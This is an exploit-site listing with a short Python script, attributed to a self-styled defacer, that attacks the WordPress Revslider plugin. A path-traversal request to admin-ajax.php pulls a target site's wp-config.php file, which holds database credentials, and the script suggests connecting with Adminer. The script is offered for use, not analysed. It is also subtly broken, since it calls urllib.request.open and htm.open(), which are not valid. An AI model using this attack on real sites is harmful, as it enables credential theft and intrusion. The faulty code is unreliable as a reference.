WordPress Revslider Exploit Grab Config

2021.09.27
tr Xale (TR) tr
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

################################# # Exploit Title: WordPress Revslider Exploit Grab Config # Author: Xale [ Turkish Defacer ] # Date: 27.09.2021 # Greetz: BetLex & Qualwin & Deus Lorenzo & GaskmanTR & 0X4-Team # Tested On: Kali Linux # Risk: Medium - High ################################## Coded With Python revslider.py import os import urllib.request os.system("sudo apt-get install figlet") os.system("clear") os.system("figlet XALE") print(" ") print("Revslider Exploit | Grab Config | Coded By Xale") print(" ") targets = input("Target WordPress Site: (Sample: example.com) ") target = targets + "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php" htm = urllib.request.open(target) print("Grabbed Config: (Connect: Adminer)") print(" ") print(htm.open()) GitHub: https://github.com/xaletr/RevSlider-Exploit


Vote for this issue:
25%
75%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top